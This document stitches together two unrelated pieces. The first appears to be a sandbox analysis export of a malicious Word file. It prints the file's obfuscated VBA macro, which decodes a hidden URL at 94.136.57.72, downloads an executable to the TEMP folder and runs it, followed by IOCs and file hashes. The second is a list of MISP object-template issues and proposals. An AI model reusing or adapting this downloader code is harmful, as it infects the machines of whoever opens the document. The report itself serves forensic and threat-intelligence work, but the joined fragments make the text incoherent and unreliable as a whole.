SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = HlFdNIYK + 1\r\nLoop\r\n\r\n pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
"analysis": {
"VBA String": [],
"Dridex String": [],
"Suspicious": [
[
"Hex Strings",
"Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
],
[
"Chr",
"May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
],
[
"StrReverse",
"May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
],
[
"Shell",
"May run an executable file or a system command"
],
[
"Environ",
"May read system environment variables"
],
[
"URLDownloadToFileA",
"May download files from the Internet"
],
[
"Lib",
"May run code from a DLL"
]
],
"Hex String": [
[
"\\vGJsdfbJHKdsf.exe",
"5C76474A736466624A484B6473662E657865"
],
[
"TEMP",
"54454D50"
]
],
"Form String": [],
"Base64 String": [],
"AutoExec": [
[
"Workbook_Open",
"Runs when the Excel Workbook is opened"
],
[
"AutoOpen",
"Runs when the Word document is opened"
]
],
"IOC": [
[
"94.136.57.72",
"IPv4 address (obfuscation: StrReverse+Hex)"
],
[
"vGJsdfbJHKdsf.exe",
"Executable file name (obfuscation: Hex)"
],
[
"http://94.136.57.72:8080/mopsi/popsi.php",
"URL (obfuscation: StrReverse+Hex)"
]
]
}
}
},
"module": null,
"date": {
"$date": 1490354278607
},
"file": {
"owners": [
"cert",
"*"
],
"sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
"names": [
"DEC2248QO.doc"
],
"probable_names": [],
"parent_analyses": [],
"antivirus": {},
"sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
"detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
"mime": "application/msword",
"analysis": [
{
"$oid": "58d4f256014ed28a5d50c113"
}
],
"groups": [
"cert",
"*"
],
"_id": {
"$oid": "58d4f256014ed28a5d50c112"
},
"type": "word",
"md5": "757e9b7209f0d6ef3cf7bfd904445009"
},
"iocs": [],
"executed_modules": [
"office_macros"
],
"probable_names": [],
"extracted_files": [],
"status": "finished",
"tags": [
"office_macros"
],
"groups": [
"cert",
"*"
],
"pending_modules": [],
"analyst": {
"$oid": "58d4e81b014ed25aaa77fabf"
},
"waiting_modules": [],
"canceled_modules": [],
"threat_intelligence": {},
"generated_files": {},
"_id": {
"$oid": "58d4f256014ed28a5d50c113"
},
"options": {}
}
}
ransom object
ransom object
x509 add relation ship
This relation should be used to link x509 certificates between us to create the certification chain. It should be used to link a PE object or url object too.
{
"name": "signed-by",
"description": "This relationship describes an object signed by another object.",
"format": [
"misp"
]
},
password brute-force object to add
password brute-force object to add
New relationships (old CYBOX best practices) to add
relationship types - list
Beside free-text relationships, we might have the following list from STIX 2.0 (http://stixproject.github.io/stix2.0/stixdocs/stix-v2.0-wd02.pdf):
attributed-to
derived-from
duplicate-of
impersonates
indicates
mitigates
related-to
targets
uses
variant-of
Regkey object
in the same way like Path object, #89
we have differents state for the reg keys:
-
use for persistence
-
read for steal informations
-
set the malware configuration like proxy settings
Reorder ui-priority for latitude and longitude in geolocation object
Reorder ui-priority for latitude and longitude in geolocation object
MISP-Modules - Object question
Quick question as i cant find any answer either in documentation or github. Can someone point me to example of code where "object" is used in a misp module (expansion) ?
x509 attribute types are different than normal attribute types
An existing attribute type is x509-fingerprint-sha1, however the x509 misp object defines the misp-attribute as md5, sha1, sha256.
This has 2 downsides:
- searching for attibute types like
x509-fingerprint-sha1(PyMISP and webinterface) will not return x509 misp-object attributes - a dump of (any) md5, sha1, sha256 which are everywhere else used for filenames, will als contain hashes related to x509 certificates; which is illogical
The proposal is thus to change the x509 object type to the
- already existing
x509-fingerprint-sha1 - newly created
x509-fingerprint-md5, andx509-fingerprint-sha256
What do you think?
Allow multiple "pattern-in-file" in file object
Allow multiple "pattern-in-file" in file object
TODO Import table
Content:
- imphash
- full import table
Allow multiple domains in domain|ip object
Allow multiple domains in domain|ip object
Diameter object generic
Diameter object generic
Session-Id
Origin-Host
Origin-Realm
Destination-Realm
Destination-Host
User-Name (usually IMSI SS7)
error during suricata object creation
x509 add fields (certigo)
Certigo tool can dump certificat information to json format.
It should be nice if we have more fields in x509 according to this tool.
You can find an example of .json dumped by certigo :
dumped-json.txt
Some interesting fields are :
- is_self_signed (boolean)
- is_ca (boolean)
- pem
- dns_names (multiple)
- key_usage (multiple). E.g Digital Signature
- extended_key_usage (multiple). E.g Serveur auth
- ocsp_server
- issuing_certificate
Subject field and Issuer field are subdivided according to the RFC 5280 (page 20) like that :
- common_name
- country
- organization
- organizational unit
- distinguished name qualifier
- state or province name
- serial number
- locality
- title
- surname
- given name
- initials
- pseudonym
- generation qualifier
- key_id
Two solutions. The first one is to rename existing field to "subject-common-name", "subject-country", "issuer-common-name", "issuer-country", etc...
The second is to create an object "subject" and "issuer" with these attributs. I don't know what is the best :)
incorrect object names "domain|ip" and "ip|port"
Hi all,
IMHO the objects names "domain|ip" and "ip|port" should read "domain-ip" and "ip-port". Otherwise, an exception "UnknownMISPObjectTemplate" could be thrown if:
- an existing Event which contains at least one of these objects is loaded by PyMISP:
- load() method in mispevent.py calls "set_all_values" (line 397) calls "from_dict"
- line 480: tmp_object = MISPObject(obj['name']) whereas obj['name'] results in either "domain|ip" or "ip|port" which are no valid object names leading to the exception
Path object
Path object following a discussion with @sebdraven we would need an object which includes the following:
- A complete path
- The split path (for correlation)
- Objective of the path (malware inner operation, stealing and ...)
Split email objects
Split email message and email addresses to keep the relation between addresses and display names
Proposal: Object: System
IP
DNS Name
Location
OS
GTP (ITU - 3GPP)
RAT config object?
